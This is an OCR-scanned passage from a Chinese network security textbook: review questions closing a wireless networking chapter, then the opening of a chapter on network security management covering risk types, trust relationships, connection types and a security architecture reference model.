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MAC 地 址 都 有 一 个 不 同 的 密 钥 ， 且 知道 此 密 钥 的 设备 较 少 ， 因 为 这 种 方案 更 安全 。 虽 然 
这 种 方案 减 小 了 受 攻击 的 可 能 性 ， 但 是 随 着 设备 数量 的 增加 ， 密 钥 的 人 工分 发 会 变 得 很 


办 


难 。 
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思考 与 练习 


. IEEE 802.11 无 线 局 域 网 有 哪 两 种 配置 实现 方案 ? 简单 说 明 这 两 种 配置 方式 。 
. 蓝牙 有 哪 两 种 组 网 方式 ? 

. 什么 是 超 宽带 ? 与 通常 所 说 的 “ 罕 带 ”和 “宽带 ”有 何 区 别 ? 

.结合 ZigBee 的 优点 ， 分 析 其 主要 的 应 用 领域 。 

. 无 线 网 络 面临 的 安全 威胁 主要 包括 哪 几 方 面 ? 如 何 预防 这 些 威胁 ? 

. 简要 描述 WEP 的 加 /解密 过 程 。 


第 14 章 网 络 安全 管理 


本 章 学 习 目标 : 

。 了 解 网 络 安全 管理 背景 ; 

掌握 网 络 安全 管理 过 程 及 步骤 ; 
掌握 评审 网 络 体系 结构 及 应 用 ; 
了 解 网 络 安全 控制 区 域 ; 

了 解 实施 和 运行 安全 控制 措施 。 


14.1 网 络 安全 管理 背景 


机 构 和 商业 组 织 的 信息 系统 绝 大 多 数 都 是 通过 网 络 连 接着 的 ， 并 且 遍 及 全 球 的 现代 网 
络 应 用 (例如 电子 政务 和 电子 商务 ) 一 直 在 不 断 增 长 。 这 些 网 络 连 接 可 能 在 组 织 内 部 、 不 
同 组 织 之 间或 组 织 与 公众 之 间 。 

公众 可 用 的 网 络 技术 的 迅猛 发 展 ， 特 别 是 互联 网 和 建立 在 其 上 的 Web， 的 确 为 商业 和 
在 线 公 共 服 务 带 来 了 极 大 的 机 会 ， 但 同时 也 带 来 了 新 的 安全 风险 。 当 一 个 组 织 极 大 地 依赖 
于 信息 与 网 络 进行 业务 活动 时 ,信息 的 保密 性 、 完 整 性 、 可 用 性 、 不 可 否认 性 、 可 核查 性 、 
真实 性 和 可 靠 性 的 丧失 或 网 络 服务 的 中 断 可 能 对 业务 运行 造成 不 可 忽视 的 负面 影响 因此， 
保护 好 信息 和 网 络 ， 管 理 好 组 织 内 信息 系统 的 安全 是 一 项 迫切 的 关键 要 求 。 

图 14-1 给 出 了 一 个 在 许多 组 织 中 都 能 看 到 的 典型 网 络 构造 场景 ， 包 括 内 联网 
(Intranet)、 外 联网 (Extranet)、 互联 网 (Intemet)、 电话 网 (phone network)、 无 线 网 (wireless 
network) 利 非 军事 化 区 (Demilitarized Zone, DMZ)。 

内 联网 是 一 个 组 织 在 其 内 部 使 用 和 维护 的 网 络 。 由 于 内 联网 位 于 组 织 的 场所 之 内 ， 而 
且 一 般 只 有 组 织 的 内 部 工作 人 员 才 能 在 物理 上 访问 到 内 联网 ， 所 以 比较 容易 对 内 联网 进行 
物理 保护 。 在 多 数 情况 下 ， 由 于 采用 的 技术 不 同 及 各 组 成 部 分 的 安全 要 求 不 同 ， 内 联网 不 
是 同 构 的 。 一 方面 ， 有 些 关键 基础 设施 ， 例 如 PKI (Public Key Infrastructure)， 需 要 比 内 
联网 自身 更 高 保护 级 别 ， 因 此 可 能 放 在 内 联网 的 一 个 专门 网 段 中 来 运行 。 另 一 方面 ， 某 些 
技术 如 WLAN (Wireless Local Area Network)， 会 引入 新 的 风险 ， 因 此 需要 进行 某 种 隔离 。 
对 于 这 两 种 情况 ， 均 可 采用 内 部 安全 网 关 来 实现 上 述 分 割 。 

当今 多 数组 织 的 业务 都 需要 与 外 部 合作 伙伴 或 其 他 组 织 进 行 通 信和 数据 交换 。 对 于 最 
重要 的 业务 合作 伙伴 ， 通 常 将 内 联网 直接 扩展 到 对 方 组 织 的 网 络 ， 这 种 扩展 一 般 被 称 为 外 
联网 。 在 绝 大 多 数 情况 下 ， 对 所 连接 的 外 部 合作 伙伴 的 信任 度 低 于 组 织 内 部 ， 因 此 需要 使 
用 外 联网 安全 网 关 来 降低 这 种 连接 带 来 的 风险 。 

今 公 共 网 络 〈 主 要 指 互联 网 ) 被 用 来 在 组 织 与 合作 伙伴 和 客户 〈 包 括 公 众 ) 之 间 提 
供 高 性 能 价格 比 的 通信 和 数据 交换 ， 提 供 各 种 形式 的 内 联网 扩展 。 由 于 公共 网 络 的 信任 度 
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低 ， 特 别 是 互联 网 ， 因 此 需要 更 为 复杂 的 安全 网 关 来 管理 相关 风险 。 这 种 安全 网 关 含 有 特 
定 模块 来 处 理 在 各 种 形式 的 内 联网 扩展 和 与 合作 伙伴 及 客户 连接 中 的 安全 需求 。 


A 


内 联网 网 关 


一 一 


图 14-1 典型 的 网 络 环境 


远程 用 户 可 采用 有 线 方式 或 无 线 方式 (例如 公共 WLAN) 经 由 互联 网 接 入 ， 也 可 采用 
电话 拨号 经 由 电话 网 连接 到 通常 位 于 互联 网 防火 墙 DMZ 内 的 远程 访问 服务 器 (remote 
access server)。 对 于 这 些 接 入 可 采用 VPN (Virtual Private Network ) 技术 实现 安全 连接 。 

当 一 个 组 织 决定 使 用 VoIP (Voice over IP) 技术 实现 内 部 电话 网 时 ， 最 好 也 部 署 适当 
的 电话 网 安全 网 关 。 

这 种 典型 的 网 络 环境 中 所 采用 的 技术 在 许多 方面 为 组 织 业务 提供 了 扩展 的 机 会 和 利 
益 , 例如 减少 或 优化 成 本 , 但 同时 也 使 网 络 环 境 变 得 复杂 ， 并 常常 引入 新 的 信息 安全 风险 。 
因此 ， 这 种 风险 应 得 到 适当 评价 ， 并 通过 适当 的 安全 控制 措施 的 实施 来 减轻 。 也 就 是 说 ， 
应 平衡 新 环境 带 来 的 机 会 和 新 技术 引入 的 风险 。 

总 之 ， 政 府 机 构 和 商业 组 织 能 否 成 功利 用 现代 网 络 环境 带 来 的 机 会 ， 取 决 于 在 多 大 程 
度 上 管理 和 控制 这 种 开放 环境 中 的 运行 风险 。 


14.2 ”网 络 安全 管理 过 程 


在 考虑 网 络 连 接 时 ， 组 织 内 所 有 对 连接 负 有 相关 责任 的 人 员 都 应 清楚 业务 需求 和 利 
益 。 另 外 ， 还 应 意识 到 这 种 连接 带 来 的 安全 风险 和 相关 的 控制 区 域 。 在 考虑 网 络 连接 、 识 
别 可 能 的 控制 区 域 以 及 最 终 选 择 、 设 计 、 实 施 和 维护 安全 控制 措施 的 过 程 中 所 采取 的 许多 
决定 和 行动 都 会 受到 业务 需求 和 利益 的 影响 。 因 此 , 在 整个 过 程 中 应 牢记 业务 需求 和 利益 。 
为 识别 适当 的 网 络 安全 要 求 和 控制 区 域 ， 应 完成 如 下 任务 。 


(1) 评审 组 织 的 整体 信息 安全 策略 中 对 网 络 连接 的 安全 要 求 ; 

(2) 评审 与 网 络 连接 相关 的 网 络 体系 结构 和 应 用 ， 以 为 接 下 来 的 任务 提供 必要 的 背景 ; 

(3) 识别 网 络 连接 的 类 型 ; 

(4) 识别 网 络 特性 和 相关 的 信任 关系 ; 

(5) 借助 于 风险 评估 和 管理 的 评审 结果 ， 确 定 相 关 安 全 风险 的 类 型 ; 

(6) 识别 与 网 络 连 接 类 型 、 网 络 特性 、 信 任 关 系 和 安全 风险 类 型 相称 的 适当 的 控制 区 
域 ， 并 确定 首选 项 ; 

(7) 实施 和 运行 安全 控制 措施 ; 

(8) 持续 地 监视 和 评审 安全 控制 措施 的 实施 。 

图 14-2 给 出 了 网 络 安全 管理 的 整个 过 程 。 
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图 14-2 网 络 安全 管理 过 程 


除了 过 程 的 主 路 径 外 ， 在 某 些 步骤 中 需要 再 审视 前 面 步骤 (特别 是 “评审 整体 信息 安 
全 策略 ”和 “评审 网 络 体系 结构 和 应 用 ”) 的 结果 以 确保 一 致 性 。 例 如: 
。 在 确定 安全 风险 类 型 之 后 ， 可 能 需要 再 次 评审 整体 信息 安全 策略 以 防 出 现 未 被 策略 
层面 禾 盖 的 情况 。 
。 在 识别 可 能 的 控制 区 域 时 ， 应 考虑 到 整体 信息 安全 策略 ， 因 为 可 能 会 有 因 策 略 需 要 
的 特殊 控制 措施 要 在 组 织 内 全 面 实施 而 不 考虑 风险 。 
。 在 评审 安全 体系 结构 选项 时 ， 为 确保 兼容 性 应 考虑 网 络 体系 结构 和 应 用 。 
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14.3 ”评审 整体 信息 安全 策略 


组 织 的 整体 信息 安全 策略 包括 与 网 络 连接 直接 相关 的 对 保密 性 、 完 整 性 、 可 用 性 、 不 
可 否认 性 、 可 核查 性 、 真 实 性 和 可 靠 性 需求 的 陈述 ， 以 及 对 威胁 类 型 的 观点 和 对 控制 措施 
的 需求 。 例 如 ， 策 略 中 可 能 规定 

(1) 主要 关注 特定 类 型 的 信息 和 服务 的 可 用 性 ; 

(2) 不 允许 通过 拨号 线路 进行 网 络 连接 ; 

(3) 所 有 到 互联 网 的 连接 应 经 过 安全 网 关 ; 

(4) 应 使 用 某 种 特殊 类 型 的 安全 网 关 ; 

(5) 未 经 过 数字 签名 的 支付 指令 是 无 效 的 。 

这 些 适 用 于 整个 组 织 或 机 构 的 声明 、 观 点 和 要 求 ， 应 在 识别 网 络 连接 的 安全 风险 和 控 
制 区 域 过 程 中 被 考虑 到 。 如 果 有 任何 这 种 安全 要 求 ， 应 列 入 可 能 的 控制 区 域 列 表 中 ， 并 在 
必要 时 反映 在 安全 体系 结构 的 选项 中 。 


14.4 评审 网 络 体系 结构 和 应 用 


网 络 连接 类 型 、 网 络 特性 、 信 任 关 系 、 安 全 风险 和 控制 区 域 的 识别 ， 以 及 安全 体系 结 
构 和 控制 措施 的 设计 ， 总 是 在 现 有 或 计划 的 网 络 体系 结构 和 应 用 的 背景 下 进行 。 因 此 ， 应 
获得 并 评审 有 关 的 网 络 体系 结构 和 应 用 的 详情 ， 以 为 接 下 来 的 这 些 步骤 提供 背景 和 理解 。 

对 网 络 和 应 用 的 体系 结构 做 尽早 考虑 ， 可 以 为 评审 这 些 体 系 结构 及 当 现 有 体系 结构 与 
可 接受 的 安全 解决 方案 发 生 冲突 时 可 能 进行 的 修改 提供 充裕 的 时 间 。 应 考虑 的 方面 包括 : 

(1) 网 络 类 型 ; 

(2) 网 络 协议 ; 

(3) 网 络 应 用 ; 

(4) 网 络 实现 技术 ; 

(5) 现 有 网 络 连接 。 

1. 网 络 类 型 

根据 网 络 履 盖 的 区 域 分 为 : 

(1) 局 域 网 (Local Area Network, LAN)， 用 于 连接 本 地 系统 。 

(2) 广域网 (Wide Area Network, WAN)， 用 于 连接 直至 世界 范围 的 系统 。 

某 些 资料 将 限制 在 一 定 区域 ( 如 城市 ) 内 的 WAN 定义 为 城 域 网 (Metropolitan Area 
Network，MAN)。 如 今 两 者 采用 相通 的 技术 ， 所 以 MAN 与 WAN 已 没有 太 大 的 区 别 。 另 
外 ， 用 于 连接 个 人 系统 的 个 人 网 (Personal Area Network，PAN) 在 这 里 被 归 类 为 LAN。 

2. 网 络 协 议 

不 同 的 网 络 协议 具有 不 同 的 安全 特性 ， 应 加 以 特别 考虑 。 例 如 : 

。 共享 介质 协议 主要 用 在 LAN 中 为 连接 的 系统 使 用 共享 介质 提供 管理 机 制 。 当 共享 

介质 被 使 用 时 ， 网 络 上 的 所 有 信息 都 可 被 所 有 连接 的 系统 访问 到 。 

。 路 由 协议 用 于 定义 信息 在 WAN 中 经 过 不 同 节点 的 传播 路 径 。 信 息 能 被 沿路 的 所 有 


系统 访问 到 ， 并 且 路 由 可 能 会 无 意 或 有 意 地 改变 。 

。 MPLS (Multi-Protocol Label Switching ) 协议 可 使 多 个 专用 网 络 透明 地 共享 一 个 核心 
运载 网 络 ， 即 某 一 专用 网 络 的 成 员 意 识 不 到 还 有 其 他 专用 网 络 在 共享 这 一 核心 网 
络 。 其 主要 应 用 是 VPN， 即 使 用 不 同 的 标签 来 识别 被 分 离 的 属于 不 同 VPN 的 传 
输 流 。 

许多 网 络 协议 不 提供 安全 性 。 例 如 ， 在 公共 网 络 上 传输 未 加 密 的 口令 ， 就 很 容易 被 攻 

击 者 使 用 从 网 络 流 中 获取 口令 的 工具 截获 。 

许多 协议 被 联合 使 用 于 不 同 的 网 络 拓扑 和 介质 ， 并 使 用 有 线 和 无 线 技术 。 在 许多 情况 

这 更 进一步 地 影响 到 安全 特性 。 

3， 网 络 应 用 

网 络 应 用 的 类 型 应 在 安全 背景 中 得 到 考虑 。 网 络 应 用 类 型 包括 : 

(1) 瘦 客 户 端 型 的 应 用 ; 

(2) 台式 机 型 的 应 用 ; 

(3) 基于 终端 模拟 的 应 用 ; 

(4) 消息 传递 型 的 应 用 ; 

(5) 基于 存储 转发 的 应 用 ; 

(6) 客户 端 /服务 器 型 的 应 用 。 

关于 应 用 在 其 使 用 的 网 络 环境 下 ， 其 特性 如 何 影响 安全 需求 ， 举 例如 下 : 

。 消息 传递 型 的 应 用 可 能 提供 了 足够 的 安全 性 ， 例 如 对 消息 进行 加 密 和 数字 签名 ， 因 
而 不 需要 在 网 络 上 实施 专门 的 安全 控制 措施 。 

。 瘦 客 户 端 型 的 应 用 可 能 需要 下 载 移动 代码 来 完成 适当 的 功能 。 在 这 种 背景 下 ， 保 密 
性 可 能 不 是 主要 问题 ， 而 完整 性 是 重要 的 ， 因 此 网 络 可 提供 适当 的 机 制 来 保护 移动 
代码 的 完整 。 如 果 有 更 高 的 安全 要 求 ， 另 一 种 选择 是 对 移动 代码 进行 数字 签名 以 提 
供 完 整 性 和 真实 性 。 这 通常 是 在 应 用 的 自身 框架 内 实现 ， 因 而 可 能 无 需 在 网 络 内 提 
供 这 种 服务 。 

。 基于 存储 转发 的 应 用 通常 将 重要 数据 临时 存储 在 中 间 节 点 做 进一步 处 理 。 如 果 有 完 
整 性 和 保密 性 的 需求 ， 则 在 网 络 中 需要 有 适当 的 控制 措施 来 保护 传输 中 的 数据 。 然 
而 ， 由 于 数据 是 临时 存储 在 中 间 节 点 机 上 ， 这 些 控制 措施 可 能 不 够 。 因 此 ， 可 能 还 
需要 另外 的 控制 措施 来 保护 存储 在 中 间 节 点 机 上 的 数据 。 

4. 网络 实 现 技术 

网 络 可 以 通过 各 种 技术 手段 来 实现 。 这 些 技术 手段 都 是 基于 网 络 所 覆盖 的 地 理 区 域 来 

进行 构造 的 。 网 络 实现 技术 包括 以 下 几 种 。 

1) 局 域 网 技术 

小 型 LAN 通常 使 用 共享 介质 技术 。 这 种 情况 下 Ethernet 协议 是 使 用 的 标准 技术 , 并 已 

经 被 扩展 以 提供 更 高 的 带宽 和 支持 无 线 环 境 。 对 于 较 大 规模 的 LAN， 鉴 于 共享 介质 技术 的 

局 限 性 ， 典 型 的 WAN 技术 也 经 常 被 用 于 LAN 环境 。LAN 可 以 是 基于 有 线 的 ， 也 可 以 是 

基于 无 线 的 。 

。 有线 LAN 通常 由 使 用 电缆 通过 网 络 交换 机 或 集线器 连接 的 节点 组 成 ， 能 提供 高 速 
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的 数据 传输 能 力 。 众 所 周知 的 有 线 LAN 技术 包括 Ethemet (IEEE 802.3) 和 令 牌 环 
(token ring) (IEEE 802.5)。 
。 无线 LAN 利用 高 频 无 线 电 波 在 空中 传输 网 络 数 据 包 ， 其 灵活 性 体现 在 无 需 铺设 网 
络 线路 便 可 快速 建立 。 众 所 周知 的 无 线 LAN 技术 包括 IEEE 802.11 和 蓝牙 。 
2) 广域网 技术 
WAN 可 以 使 用 自 有 电缆 和 服务 提供 商 的 线路 ， 或 者 通过 租用 远程 通信 提供 商 的 服务 
来 构成 。WAN 技术 可 以 长 距离 地 传输 和 路 由 网 络 流 ， 并 提供 扩展 的 路 由 特性 将 网 络 数据 
包 传送 到 正确 的 目的 LAN。 通 常 公共 的 物理 联网 基础 设施 用 于 LAN 的 互联 ， 例 如 ， 租 用 
的 线路 、 卫 星 信 道 或 光纤 。WAN 可 以 是 基于 有 线 的 ， 也 可 以 是 基于 无 线 的 。 
。 有 线 WAN 通常 由 经 远程 通信 线路 连接 到 公共 或 私有 网 络 的 路 由 设备 组 成 。 众 所 周 
知 的 有 线 WAN 技术 包括 ATIM、 帧 中 继 (frame relay) 和 又 .25 。 
。 无线 WAN 通常 使 用 无 线 电波 在 空中 长 距离 〈 几 十 公里 或 更 长 ) 传输 网 络 数据 包 。 
众所周知 的 无 线 WAN 技术 包括 TDMA、CDMA、GSM 和 IEEE 802.16。 
S. 现 有 网 络 连接 
在 评审 网 络 体系 结构 和 应 用 时 ， 还 应 考虑 组 织 内 外 的 现 有 网 络 连接 。 组 织 的 现 有 网 络 
连接 可 能 会 因 某 种 原因 (例如 协议 或 合同 限制 或 阻止 新 的 连接 。 其 他 网 络 连接 的 存在 可 
能 会 引入 额外 的 脆弱 性 ， 并 因此 面临 更 高 的 风险 ， 从 而 可 能 需要 更 强 或 附加 的 控制 措施 。 


14.5 识别 网 络 连接 类 型 


-个 组 织 或 团体 可 能 需要 利用 的 网 络 连接 有 多 种 类 型 。 一 些 连 接 可 能 是 通过 限于 已 知 
团体 访问 的 私有 网 络 建立 的 ， 另 一 些 可 能 是 通过 可 被 任何 组 织 或 个 人 访问 的 公共 网 络 建立 
的 。 这 些 网 络 连 接 类 型 可 能 用 于 各 种 服务 ,例如 电子 邮件 或 电子 数据 交换 (Electronic Data 
Interchange，EDI)， 可 能 利用 互联 网 、 内 联网 或 外 联网 设施 ， 每 种 情况 都 有 不 同 的 安全 考 
虑 。 每 种 连接 类 型 会 有 不 同 的 脆弱 性 和 相关 的 不 同 风险 ， 因 此 最 终 需 要 不 同 的 安全 控制 
音 施 。 

表 14-1 给 出 了 一 种 从 业务 角度 进行 网 络 连接 类 型 划分 的 方式 。 应 考虑 有 关 的 网 络 体系 
结构 和 应 用 来 选择 合适 的 网 络 连接 类 型 。 由 于 从 业务 角度 而 非 技术 角度 划分 网 络 连接 类 型 ， 
不 同 的 网 络 连接 类 型 有 时 可 能 由 类 似 的 技术 手段 实现 ， 并 且 在 某 些 情况 下 所 采用 的 控制 措 
施 是 类 似 的 ， 但 在 其 他 情况 下 却 不 同 。 


表 14-1 网 络 连接 类 型 


皇 


标识 符号 连接 类 型 


在 一 个 组 织 的 单一 受 控 场 所 内 的 连接 

在 同一 组 织 的 不 同 地 理 位 置 之 间 的 连接 

在 一 个 组 织 与 离开 该 组 织 场所 进行 工作 的 人 员 之 间 的 连接 
在 一 个 封闭 团体 内 不 同 组 织 之 问 的 连接 

与 其 他 组 织 的 连接 

与 一 般 公共 领域 的 连接 

从 一 个 卫 环境 到 公共 电话 网 的 连接 


ATHONW> 


14.6 ”识别 网 络 特性 和 信任 关系 


1. 网 络 特性 

应 识别 现 有 或 将 有 网 络 的 特性 。 识 别 如 下 网 络 特性 尤为 重要 。 

。 公共 网 络 : 可 被 任何 人 访问 的 网 络 。 

。 私有 网 络 : 诸如 由 自 有 或 租用 线路 组 成 的 网 络 ， 因 此 被 认为 比 公共 网 络 更 安全 。 

知道 网 络 传输 的 数据 类 型 也 很 重要 。 

。 数据 网 络 : 使 用 数据 协议 主要 传输 数据 的 网 络 。 

。 音频 网 络 : 可 用 于 电话 但 也 可 传输 数据 的 网 络 。 

。 数据、 音频 和 视频 组 合 网 络 。 

其 他 相关 信息 还 有 : 

。 网 络 是 组 交换 还 是 线路 交换 ; 

。 在 MPLS 网 络 中 是 否 支持 QoS (Quality of Service )。 

2， 信任 关系 

在 识别 出 现 有 或 将 有 网 络 的 特性 之 后 ， 就 应 识别 相关 的 信任 关系 。 

首先 ， 使 用 如 下 的 简单 列表 识别 与 网 络 连接 相关 的 适用 的 信任 环境 。 

(1) 低 : 诸如 与 未 知 用 户 团体 连接 的 网 络 。 

(2) 中 : 诸如 与 已 知 用 户 团体 连接 或 在 有 多 个 组 织 的 封闭 业务 团体 内 连接 的 网 络 。 

(3) 高 : 诸如 只 与 组 织 内 已 知 用 户 团体 连接 的 网 络 。 

其 次 ， 将 相关 的 信任 环境 〈 低 、 中 和 高 ) 关联 到 使 用 的 网 络 和 网 络 连接 类 型 (从 A 到 
G) 来 建立 信任 关系 。 表 14-2 采用 和 矩阵 的 形式 完成 了 这 种 信任 关系 的 建立 。 


表 14-2 ”信任 关系 的 识别 


网 络 连接 类 型 


由 表 14-3 可 以 确定 信任 关系 的 参考 类 别 。 


表 14-3 ”信任 关系 的 参考 类 别 


信任 关系 类 别 。” 描述 信任 关系 类 别 ”描述 


低 /公共 低 信任 环境 并 使 用 公共 网 络 低 / 私 有 低 信 任 环 境 并 使 用 私有 网 络 
中 /公共 中 信任 环境 并 使 用 公共 网 络 中 /私有 中 信任 环境 并 使 用 私有 网 络 
高 /公共 高 信任 环境 并 使 用 公共 网 络 高 /私有 高 信任 环境 并 使 用 私有 网 络 


这 些 参考 类 型 应 被 应 用 于 确认 安全 风险 和 识别 控制 区 域 的 过 程 中 ， 必 要 时 辅 以 网 络 体 
系 结构 和 应 用 方面 的 可 用 信息 。 


14.7 识别 安全 风险 


如 前 所 述 ， 当 今 大 多 数组 织 依靠 信息 系统 和 网 络 的 使 用 来 支持 其 业务 运行 。 在 许多 情 | 14 
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况 下 ， 对 于 网 络 连接 ， 无 论 是 在 组 织 场所 内 的 信息 系统 之 间 ， 还 是 到 组 织 内 部 或 外 部 的 其 
他 场所 ， 包 括 到 一 般 的 公共 区 域 ， 都 有 明确 的 业务 需求 。 当 组 织 连 接 到 另 一 个 网 络 时 ， 应 
十 分 注意 不 要 将 该 组 织 暴露 在 另外 的 风险 中 , 避免 潜在 威胁 利用 这 一 连接 所 引入 的 脆弱 性 。 
这 种 风险 可 能 源 自 网 络 连接 本 身 ， 也 可 能 源 自 网 络 连 接 的 另 一 端 。 

有 些 风险 与 确保 法 律 和 规章 的 符合 性 有 关 。 特 别 需 要 关注 隐私 和 数据 保护 法 。 值 得 关 
注 的 安全 风险 类 型 包括 : 

(1) 未 授权 访问 信息 ; 

(2) 未 授权 发 送信 息 ; 

(3) 引入 恶意 代码 ; 

(4) 否认 接受 或 发 起 ; 

(5) 拒绝 服务 连接 ; 

(6) 信息 和 服务 不 可 用 。 

当 组 织 面 临 这 些 安全 风险 时 可 能 导致 如 下 安全 属性 的 损失 : 

(1) 网 络 和 与 网 络 连 接 的 系统 中 的 信息 和 代码 的 保密 性 ; 

(2) 网 络 和 与 网 络 连 接 的 系统 中 的 信息 和 代码 的 完整 性 ; 

(3) 信息 和 网 络 服务 及 与 网 络 连 接 的 系统 的 可 用 性 ; 

(4) 网 络 交易 的 不 可 和 否认 性 ; 

(5) 网 络 交易 的 可 核查 性 ; 

(6) 信息 以 及 网 络 用 户 和 管理 员 的 真实 性 ; 

(7) 网 络 和 与 网 络 连接 的 系统 中 的 信息 和 代码 的 可 靠 性 ; 

(8) 对 未 授权 使 用 和 挖掘 网 络 资源 的 可 控 性 。 

不 是 所 有 安全 风险 类 别 都 适用 于 所 有 场所 或 所 有 组 织 。 然 而 ， 相 关 的 安全 风险 类 别 应 
予以 识别 ， 这 样 才 能 识别 出 可 能 的 控制 区 域 ， 并 最 终 选择 、 设 计 、 实 施 和 维护 控制 措施 。 

图 14-3 给 出 了 一 个 表示 安全 风险 类 型 在 哪里 发 生 的 网 络 安全 概念 模型 。 


1 1 
不 可 否认 性 | 保密 性 、 完整 性 .可 用 性 和 可 靠 性 | 不 可 否认 性 
可 检查 性 。 1 De 1 可 检查 性 
真实 性 。 | 2 1 ”真实 性 
可 性 1 A | SS 1 可 性 
1 > wa 
| | 数据 & 代 码 传输 中 的 数据 交代 码 数据 & 代 码 “| | 
终端 系统 | | == 二 = 三 二 = 二 pe | [终端 系统 
& | 网 络 要 素 网 络 要 素 =tw|  && 
用 户 | | 用 户 
| | 
上 上 
管理 员 、、 pa 管理 员 
Ny 本 
~ 


鉴别 、 授 权 和 访问 控制 
图 14-3 ”网络 安全 风险 区 域 的 概念 模型 


应 收集 与 上 述 安全 风险 类 型 有 关 的 业务 运行 方面 的 信息 ， 同 时 考虑 业务 所 涉及 信息 的 
敏感 性 或 价值 ， 以 及 相关 的 潜在 威胁 和 脆弱 性 。 值 得 强调 的 是 ， 在 完成 识别 安全 风险 这 项 
任务 中 ， 应 利用 针对 网 络 连 接 进行 的 安全 风险 评估 和 管理 的 评审 结果 。 这 些 结果 有 助 于 在 
所 进行 的 评审 详细 程度 级 别 上 注视 与 上 述 安 全 风险 类 型 相关 的 潜在 的 负面 业务 影响 、 所 关 
心 的 威胁 和 脆弱 性 以 及 由 此 得 出 的 风险 。 


14.8 ”识别 控制 区 域 


基于 风险 评估 和 管理 的 评审 结果 ， 加 上 针对 网 络 所 识别 的 安全 风险 ， 应 从 本 节 和 
ISO/TEC 27002 中 识别 和 选择 可 能 的 控制 区 域 。 实 际 上 ， 一 个 特定 安全 解决 方案 可 能 包括 
多 个 控制 区 域 。 

对 于 识别 出 的 控制 措施 ， 应 在 相关 的 网 络 体 系 结构 和 应 用 的 背景 下 进行 充分 的 评审 。 
在 进行 了 必要 的 适当 调整 后 ， 作 为 实施 所 需 安全 控制 措施 以 及 监视 和 评审 实施 的 根据 。 


14.8.1 网 络 安全 体系 结构 


给 出 一 个 安全 体系 结构 参考 模型 有 助 于 : 

。 描述 支持 网 络 安全 规划 、 设 计 和 实施 的 一 致 框架 ; 

。 定义 普遍 的 安全 相关 的 体系 结构 要 素 ， 并 通过 适当 地 应 用 提供 端 到 端的 网 络 安全 。 

基于 安全 体系 结构 参考 模型 来 描述 采用 不 同 现实 技术 以 满足 今天 和 未 来 需求 的 实际 
安全 体系 结构 是 有 益 的 。 

安全 体系 结构 参考 模型 中 描述 的 原理 适用 于 任何 类 型 的 现代 网 络 ， 无 论 是 数据 、 音 频 
还 是 综合 网 络 ， 无 论 是 有 线 还 是 无 线 网 络 ， 并 且 能 够 独立 于 网 络 技术 或 协议 来 应 用 。 它 关 
注 网 络 基 础 设施 、 服 务 和 应 用 的 管理 、 控 制 和 使 用 层面 上 的 安全 问题 ， 提 供 一 个 全 面 的 、 
自 上 而 下 的 、 端 到 端的 网 络 安全 视角 。 

安全 体系 结构 参考 模型 由 如 下 三 个 体系 结构 组 件 构成 : 

(1) 安全 维 ， 又 称 为 安全 控制 措施 组 ; 

(2) 安全 层 ， 又 称 为 安全 要 素 ; 

(3) 安全 面 ， 又 称 为 安全 域 。 

安全 维 是 一 组 用 来 处 理 网 络 安全 某 一 特定 方面 的 安全 控制 措施 。 为 了 提供 端 到 端 得 安 
全 解决 方案 ， 安 全 维 需 要 应 用 到 网 络 设备 和 设施 分 组 的 层次 结构 上 ， 即 安全 层 ， 包 括 : 

。 基础 设施 安全 层 ; 

。 应 用 安全 层 。 

安全 层 以 一 层 建 立 在 另 一 层 上 的 方式 来 提供 基于 网 络 的 安全 解决 方案 ， 即 基础 设施 安 
全 层 支 撑 服 务 安全 层 ， 服 务 安全 层 支撑 应 用 安全 层 ， 并 通过 有 层次 顺序 的 网 络 安 全 视角 来 
识别 应 在 系统 中 的 哪里 实施 安全 控制 。 

基础 设施 安全 层 由 网 络 传输 设施 和 各 网 络 部 件 组 成 ， 并 受到 实现 安全 维 的 机 制 保护 。 
基础 设施 安全 层 的 组 件 包括 路 由 器 、 交 换 机 和 服务 器 以 及 它们 之 间 的 通信 线路 等 。 

服务 安全 层 关注 与 服务 提供 商 为 其 客户 提供 的 服务 安全 。 这 些 安全 服务 从 基本 传输 和 
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服务 连接 到 增值 服务 。 

应 用 安全 层 聚 焦 于 服务 提供 商 的 客户 访问 网 络 应 用 的 安全 。 这 些 网 络 应 用 由 网 络 服务 
支撑 ,包括 基本 的 文件 传输 和 Web 浏览 器 应 用 ， 目 录 辅 助 、 基 于 网 络 的 音频 通信 和 电子 邮 
件 这 样 的 基础 应 用 ， 以 及 客户 关系 管理 、 电 子 /移动 商务 、 基 于 网 络 的 培训 、 视 频 协 作 等 这 
样 的 高 端 应 用 。 

安全 面 是 指 网 络 活动 的 类 型 ， 并 受到 实现 安全 维 的 机 制 保护 。 安 全 体系 结构 参考 模型 
定义 了 如 下 三 个 安全 面 来 表示 受 保护 网 络 活动 的 类 型 : 

。 管理 面 ; 

。 控制 面 ; 

。 终端 用 户 面 。 

这 些 安全 面 分 别 关 注 于 与 网 络 管理 活动 、 网 络 控制 活动 和 终端 用 户 活动 相关 的 特定 安 
全 需求 。 网 络 设计 应 尽 可 能 地 保持 属于 不 同安 全 面 的 活动 的 适当 独立 性 。 

实际 的 技术 性 网 络 安全 体系 结构 与 现实 网 络 所 采用 的 各 种 技术 密切 相关 ， 包 括 : 局 域 
网 、 广 域 网 .IEEE 802.11、 蓝牙 、3G、GPRS、CDPD 和 CDMA、 宽 带 网 (broadband network)、 
安全 网 关 (security gateway) 防火 墙 、VPN (virtual private network)、 远程 访 问 服务 (remote 
access service，RAS) 通过 互联 网 通信 、 拨 号 IP 服务 、 电 子 邮件 、 互 联网 服务 、Web 托管 
服务 (Web hosting service )。 

通过 分 析 上 述 技术 背景 下 所 面临 的 安全 风险 ， 选 择 相应 的 安全 控制 措施 。 在 最 终 确 定 
要 实施 的 控制 措施 之 间 , 应 将 技术 性 网 络 安全 体系 结构 全 部 形成 文件 并 完全 达成 一 致意 见 。 


14.8.2 ”网 络 安 全 控制 区 域 


1. 安全 服务 管理 框架 

任何 联网 的 一 个 关键 安全 要 求 应 有 发 起 和 控制 安全 实施 和 操作 的 安全 服务 管理 活动 
的 支持 。 这 些 活动 将 确保 组 织 或 团体 的 信息 系统 所 有 方面 的 安全 。 就 网 络 连接 而 言 ， 管 理 
活动 应 包括 : 

(1) 定义 所 有 与 网 络 安全 相关 的 责任 ， 指 定 负 有 全 面 责任 的 一 个 安全 管理 者 ; 

(2) 建立 文件 化 的 网 络 安 全 策略 及 其 相关 的 技术 性 安全 体系 结构 ; 

(3) 编制 文件 化 的 安全 操作 规程 ; 

